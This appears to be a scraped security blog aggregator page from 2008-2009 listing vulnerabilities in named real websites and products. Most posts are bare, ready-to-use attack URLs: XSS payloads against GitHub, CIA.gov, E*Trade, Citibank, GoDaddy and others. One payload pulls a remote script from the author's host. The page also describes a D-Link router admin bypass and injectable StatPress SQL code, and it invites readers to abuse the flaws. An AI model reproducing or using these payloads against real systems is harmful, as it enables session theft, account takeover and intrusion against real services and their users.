My Security Planet » hiredhacker.com

hiredhacker.com

D-Link DIR-615 Remote Exploit

Posted: December 15th, 2009, 12:55pm CST by Gerry Eisenhaur

Tags: [edit]

D-Link’s DIR-615 Wireless N Router (http://www.dlink.com/products/?pid=565) contains a flaw that allows attackers to access administrative functions without authorization. By simply requesting a certain URL, this vulnerability can be used to perform numerous attacks including changing the admin password, disabling wireless security, and changing DNS settings. The hole is confirmed in firmware version 3.10NA. Example (changes admin password [...]
GitHub XSS

Posted: December 15th, 2009, 12:29pm CST by Gerry Eisenhaur

Tags: [edit]

http://github.com/search?q=python&type=Everything&repo='"><script>alert(/pwned/)</script>
CIA.gov and Recovery.gov XSS

Posted: December 15th, 2009, 12:24pm CST by Gerry Eisenhaur

Tags: [edit]

https://www.cia.gov/search?q="%20style%3d"position:absolute;top:-100px;left:-100px;width:10000px;height:10000px;z-index:999;"%20onmouseover%3d"alert(/pwn3d/) http://www.recovery.gov/_layouts/1033/Recovery500.aspx?errorurl=<script>alert('and pwned again')</script>&error=<script>alert('pwned')</script>
Google Wave Invites

Posted: December 12th, 2009, 7:57am CST by Gerry Eisenhaur

Tags: [edit]

More Google Wave invites, who wants em?
Fun with E*Trade

Posted: November 4th, 2008, 1:21pm CST by Gerry Eisenhaur

Tags: [edit]

Most of these require the user to be logged in, and for those who don’t know, the ‘expression’ technique only works on IE. You will need to use a different method if you want to test it on other browsers. See Rsnakes cheat sheet for exmaples. https://www.etrade.wallst.com/v1/stocks/snapshot/symbol_lookup.asp?textIn=%22%3E%3Cscript%20src=%22http://www.hiredhacker.com/xss.js%22%3E%3C/script%3E https://us.etrade.com/e/t/accounts/changemyivrpin?FROM_PAGE=changemypasswords%22+style=%22width:expression(alert(/owned/)) https://express.etrade.com/e/t/applogic/OLAMasterpage2?SC=NPNK4KV%22+style=%22width:expression(alert(/owned/)) https://us.etrade.com/e/t/user/login?TYPE=&REALMOID=&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=&TARGET=%22+style=%22width:expression(alert(/owned/)) https://global.etrade.com/e/t/intl/page?nav=3&subnav=4&screen=1%27;alert(/owned/);//&language=en&country=gl (nav and subnav are also vulnerable parameters)
StatPress/StatPress Reloaded - SQL Injections

Posted: November 3rd, 2008, 10:36am CST by Gerry Eisenhaur

Tags: [edit]

iriStatAppend() // URL (requested) $urlRequested = iri_StatPress_URL(); ... $referrer = (isset($_SERVER['HTTP_REFERER']) ? htmlentities($_SERVER['HTTP_REFERER']) : ''); ... $insert = "INSERT INTO " . $table_name . " (date, time, ip, urlrequested, agent, referrer, search,nation,os,browser,searchengine,spider,feed,user,timestamp) " . "VALUES ('$vdate','$vtime','$ipAddress','$urlRequested','" . addslashes(strip_tags($userAgent)) . "','$referrer','" . addslashes(strip_tags($search_phrase)) . "','" . iriDomain($ipAddress) . "','$os','$browser','$searchengine','$spider','$feed','$userdata->user_login','$timestamp')"; $results = $wpdb->query($insert); iri_StatPress_Vars() if (strpos(strtolower($body), "%thistotalvisits%") !== false) { $qry = $wpdb->get_results("SELECT count(DISTINCT(ip)) [...]
Technorati XSS

Posted: November 2nd, 2008, 7:22am CST by Gerry Eisenhaur

Tags: [edit]

If anyone is interested, Technorati is full of bugs like this. http://technorati.com/blogs/tag/%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E http://www.technorati.com/404please%27);alert(1);// http://www.technorati.com/search/%22%3E%3Cscript%3Ealert(1)%3C/script%3E [POST]http://www.technorati.com/account/bio/?bio_blurb=&company=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&zipcode=&country=US&func=updateuser
More StumbleUpon.com Bugs

Posted: November 1st, 2008, 10:04am CDT by Gerry Eisenhaur

Tags: [edit]

Free stumbles anyone? http://www.stumbleupon.com/recover.php?email=no%40no.com%22%3E%3Cscript%3Ealert(1);%3C/script%3E http://www.stumbleupon.com/find_friend.php?q=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
Citibank XSS

Posted: October 31st, 2008, 10:29am CDT by Gerry Eisenhaur

Tags: [edit]

http://www.citibank.com/domain/contact/index.htm?_u=visitor&_uid=&_profile=%2522%2522%253e%253cimg src=%2522%2522 onerror=%2522alert(1)%2522
Godaddy.com XSS

Posted: October 30th, 2008, 5:07pm CDT by Gerry Eisenhaur

Tags: [edit]

Anyone want to take over a few domains? https://dcc.godaddy.com/DccError.aspx?sa=%22+onerror%3d%27alert(1)%27+%22 https://dcc.godaddy.com/default.aspx?activeview=transfer&filtertype=3&sa=%22+onerror%3d%27alert(1)%27+%22 https://mya.godaddy.com/myaError.aspx?sa=%27%20onerror=%27alert(1) It’s scary how full of holes godaddy.com is, this is just a sample of what I saw while I was transferring my domains to webfaction.

← 1 Raindrop Matasano Chargen →

My Security Planet » hiredhacker.com

Feeds

hiredhacker.com

Posted: December 15th, 2009, 12:55pm CST by Gerry Eisenhaur

Tags: [edit]

Posted: December 15th, 2009, 12:29pm CST by Gerry Eisenhaur

Tags: [edit]

Posted: December 15th, 2009, 12:24pm CST by Gerry Eisenhaur

Tags: [edit]

Posted: December 12th, 2009, 7:57am CST by Gerry Eisenhaur

Tags: [edit]

Posted: November 4th, 2008, 1:21pm CST by Gerry Eisenhaur

Tags: [edit]

Posted: November 3rd, 2008, 10:36am CST by Gerry Eisenhaur

Tags: [edit]

Posted: November 2nd, 2008, 7:22am CST by Gerry Eisenhaur

Tags: [edit]

Posted: November 1st, 2008, 10:04am CDT by Gerry Eisenhaur

Tags: [edit]

Posted: October 31st, 2008, 10:29am CDT by Gerry Eisenhaur

Tags: [edit]

Posted: October 30th, 2008, 5:07pm CDT by Gerry Eisenhaur

Tags: [edit]